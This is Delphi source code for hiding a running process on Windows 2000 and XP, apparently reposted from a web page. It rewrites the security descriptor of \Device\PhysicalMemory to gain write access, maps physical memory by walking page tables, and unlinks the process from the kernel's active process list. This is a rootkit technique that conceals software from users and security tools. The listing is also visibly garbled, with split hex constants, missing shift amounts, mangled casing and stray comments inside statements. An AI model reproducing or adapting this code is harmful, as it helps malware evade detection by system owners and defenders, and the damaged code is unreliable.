Delphi Hidden Process

interface function Myhideprocess:boolean;    Implementation uses Windows, Classes, Aclapi, Accctrl;    Type NTSTATUS = Longint;  Const//nt_success (status) (status) >= 0) Status_info_length_mismatch = NTSTATUS ($C 0000004);  status_access_denied = NTSTATUS ($C 0000022);  Obj_inherit = $00000002;  Obj_permanent = $00000010;  Obj_exclusive = $00000020;  Obj_case_insensitive = $00000040;  obj_openif = $00000080;  Obj_openlink = $00000100;  Obj_kernel_handle = $00000200;    Obj_valid_attributes = $000003F2;  Type pio_status_block = ^io_status_block;  Io_status_block = Record Status:ntstatus;  Fobject:dword;    End  punicode_string = ^unicode_string;  Unicode_string = Record Length:word;  Maximumlength:word;  Buffer:pwidechar;    End  Pobject_attributes = ^object_attributes;  Object_attributes = Record Length:dword;  Rootdirectory:pointer;  objectname:punicode_string;  Attributes:dword;  Securitydescriptor:pointer; Securityqualityofservice:pointer; End  Tzwopensection = function (sectionhandle:phandle;  Desiredaccess:access_mask; objectattributes:pobject_attributes): NTSTATUS;  stdcall;  Trtlinitunicodestring = procedure (destinationstring:punicode_string; Sourcestring:pwidechar);    stdcall;  var rtlinitunicodestring:trtlinitunicodestring = nil;  Zwopensection:tzwopensection = nil;  G_hntdll:thandle = 0;  G_pmapphysicalmemory:pointer = nil;  G_hmpm:thandle = 0;  G_hmpm2:thandle = 0;  G_osvi:osversioninfo;  B_hide:boolean = false;  ---------------------------------------------------------------------------function Initntdll:boolean;    Begin G_hntdll: = LoadLibrary (' Ntdll.dll ');  If 0 = G_hntdll THEN BEGIN Result: = FALSE;  Exit;    End  Rtlinitunicodestring: = GetProcAddress (G_hntdll, ' rtlinitunicodestring ');    Zwopensection: = GetProcAddress (G_hntdll, ' zwopensection ');  Result: = True;  End  ---------------------------------------------------------------------------procedure Closentdll; Begin  if (0 <> g_hntdll) then FreeLibrary (G_hntdll);  G_hntdll: = 0;  End ---------------------------------------------------------------------------procedure  Setphyscialmemorysectioncanbewrited (Hsection:thandle);  var Pdacl:pacl;  Psd:ppsecurity_descriptor;  Pnewdacl:pacl;  Dwres:dword;  ea:explicit_access;  Begin PDACL: = nil;  PSD: = nil;    Pnewdacl: = nil;    Dwres: = GetSecurityInfo (Hsection, Se_kernel_object, dacl_security_information, nil, nil, pdacl, Nil, PSD);  If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^));  If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL));    End  ZeroMemory (@ea, sizeof (explicit_access));  Ea.grfaccesspermissions: = Section_map_write;  Ea.grfaccessmode: = grant_access;  Ea.grfinheritance: = no_inheritance; Ea.  Trustee.trusteeform: = Trustee_is_name; Ea.  Trustee.trusteetype: = Trustee_is_user; Ea.    Trustee.ptstrname: = ' current_user '; Dwres: = SetEntriesInAcl (1, @ea, Pdacl, Pnewdacl);   If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^));  If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL));    End    Dwres: = SetSecurityInfo (Hsection, Se_kernel_object, dacl_security_information, nil, nil, pnewdacl, nil);  If error_success <> dwres then BEGIN if Assigned (PSD) then LocalFree (hlocal (psd^));  If Assigned (Pnewdacl) then LocalFree (hlocal (PNEWDACL));    End  End ---------------------------------------------------------------------------function Openphysicalmemory:  Thandle;  var status:ntstatus;  physmemstring:unicode_string;  Attributes:object_attributes;  Phydirectory:dword;  Begin G_osvi.dwosversioninfosize: = sizeof (OSVERSIONINFO);    GetVersionEx (G_OSVI);  if (5 <> g_osvi.dwmajorversion) THEN begin Result: = 0;  Exit;    End  Case G_osvi.dwminorversion of 0:phydirectory: = $30000;  1:phydirectory: = $39000;  ELSE begin Result: = 0;  Exit;  End    End Rtlinitunicodestring (@physmemString, ' \device\physicalmemory '); Attributes.  Length: = SizeOf (object_attributes); Attributes.  RootDirectory: = nil; Attributes.  ObjectName: = @physmemString; Attributes.  Attributes: = 0; Attributes.  SecurityDescriptor: = nil; Attributes.    Securityqualityofservice: = nil;    Status: = Zwopensection (@g_hMPM, Section_map_read or Section_map_write, @attributes);  if (status = status_access_denied) THEN begin Zwopensection (@g_hMPM, Read_control or WRITE_DAC, @attributes);  Setphyscialmemorysectioncanbewrited (G_HMPM);    CloseHandle (G_HMPM);  Status: = Zwopensection (@g_hMPM, Section_map_read or Section_map_write, @attributes);    End  If not (Longint (status) >= 0) THEN begin Result: = 0;  Exit;    End    G_pmapphysicalmemory: = MapViewOfFile (G_HMPM, file_map_read or File_map_write, 0, Phydirectory, $1000);  if (g_pmapphysicalmemory = nil) THEN BEGIN Result: = 0;  Exit;    End  Result: = G_HMPM;  End //---------------------------------------------------------------------------function Lineartophys (baseaddress:pulong; addr:pointer): Pointer;  var vaddr, PGDE, PTE, paddr, Tmp:dword;  Begin VADDR: = DWORD (addr);  PGDE: = baseaddress[vaddr shr 22]; PGDE: = Pulong (DWORD (baseaddress) + (vaddr shr) * SIZEOF (ULONG)) ^;    Modify by Dot.  If 0 = (PGDE and 1) THEN BEGIN Result: = nil;  Exit;    End    TMP: = PGDE and $00000080;  if (0 <> tmp) THEN BEGIN PADDR: = (PGDE and $FFC 00000) + (VADDR and $003FFFFF);  End ELSE begin PGDE: = DWORD (MapViewOfFile (G_HMPM, 4, 0, PGDE and $FFFFF 000, $1000));  PTE: = (Pdword (PGDE)) [(Vaddr and $003ff000) SHR 12]; PTE: = Pdword (PGDE + ((vaddr and $003ff000) shr) * SIZEOF (DWord)) ^;    Modify by Dot.  if (0 = (PTE and 1) THEN BEGIN Result: = nil;  Exit;    End  PADDR: = (PTE and $FFFFF) + (VADDR and $00000FFF);  UnmapViewOfFile (Pointer (PGDE));    End  Result: = Pointer (PADDR);  End ---------------------------------------------------------------------------function GetData (addr:Pointer): DWORD;  var phys, Ret:dword;  Tmp:pdword;  Begin Phys: = ULONG (Lineartophys (G_pmapphysicalmemory, Pointer (addr)));    TMP: = Pdword (MapViewOfFile (G_HMPM, file_map_read or File_map_write, 0, Phys and $FFFFF 000, $1000));  if (nil = tmp) THEN BEGIN Result: = 0;  Exit;    End  RET: = tmp[(Phys and $FFF) SHR 2]; RET: = Pdword (DWORD (TMP) + ((Phys and $FFF) SHR 2) * SIZEOF (DWORD)) ^;  Modify by Dot.    UnmapViewOfFile (TMP);  Result: = ret;    End  function SetData (addr:pointer; data:dword): Boolean;  var Phys:dword;  Tmp:pdword;  Begin Phys: = ULONG (Lineartophys (G_pmapphysicalmemory, Pointer (addr)));    TMP: = Pdword (MapViewOfFile (g_hmpm, File_map_write, 0, Phys and $FFFFF 000, $1000));  if (nil = tmp) THEN BEGIN Result: = FALSE;  Exit;    End  Tmp[(Phys and $FFF) SHR 2]: = data; Pdword (DWORD (TMP) + ((Phys and $FFF) SHR 2) * SizeOf (DWORD) ^: = data;  Modify by Dot.    UnmapViewOfFile (TMP);  Result: = TRUE;  End //---------------------------------------------------------------------------{long __stdcall exeception (struct _exception_pointers *tmp) begin ExitProcess (0); return 1;  END}//---------------------------------------------------------------------------function Yhideprocess:boolean;  var thread, Process:dword;  FW, Bw:dword;  Begin//SetUnhandledExceptionFilter (exeception);  if (false = Initntdll) THEN BEGIN Result: = FALSE;  Exit;    End  if (0 = openphysicalmemory) THEN BEGIN Result: = FALSE;  Exit;    End Thread: = GetData (Pointer ($FFDFF 124)); Kteb Process: = GetData (Pointer (thread + $44));  Kpeb if (0 = g_osvi.dwminorversion) THEN BEGIN FW: = GetData (Pointer (process + $A 0));    BW: = GetData (Pointer (Process + $A 4));  SetData (Pointer (fw + 4), BW);    SetData (Pointer (BW), FW);  Result: = TRUE;  End else if (1 = g_osvi.dwminorversion) THEN BEGIN FW: = GetData (Pointer (process + $88));    BW: = GetData (Pointer (process + $8c));  SetData (Pointer (fw + 4), BW);    SetData (Pointer (BW), FW); Result: = TRUE;  End ELSE begin Result: = False;    End  CloseHandle (G_HMPM);  Closentdll;    End  function Myhideprocess:boolean;  Begin if not b_hide then begin b_hide: = yhideprocess;    End  Result: = B_hide;    End    End.

　　

Delphi Hidden Process